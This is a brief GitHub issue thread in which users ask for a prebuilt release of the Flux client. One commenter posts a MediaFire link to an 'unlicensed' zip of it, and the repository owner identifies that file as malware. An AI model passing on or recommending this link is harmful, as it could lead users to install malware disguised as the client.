### ISSUE TITLE
Turn this into the client

### ISSUE THREAD

**Issue by LightyCat** [jeremypelletier/flux-opensource#11]
Turn this source code into the flux client

**Comment by Eivind22** [comment]
would it be possible to just add a .zip file to "Releases" that i can just unzip and put in my "versons" folder? (building stuff is something im quite new to)

**Comment by 785yyy** [comment]
https://www.mediafire.com/file/yiqkp8nl53cbose/Flux_b39_unlincensed.zip/file

**Comment by jeremypelletier** [comment]
> https://www.mediafire.com/file/yiqkp8nl53cbose/Flux_b39_unlincensed.zip/file

Malware.
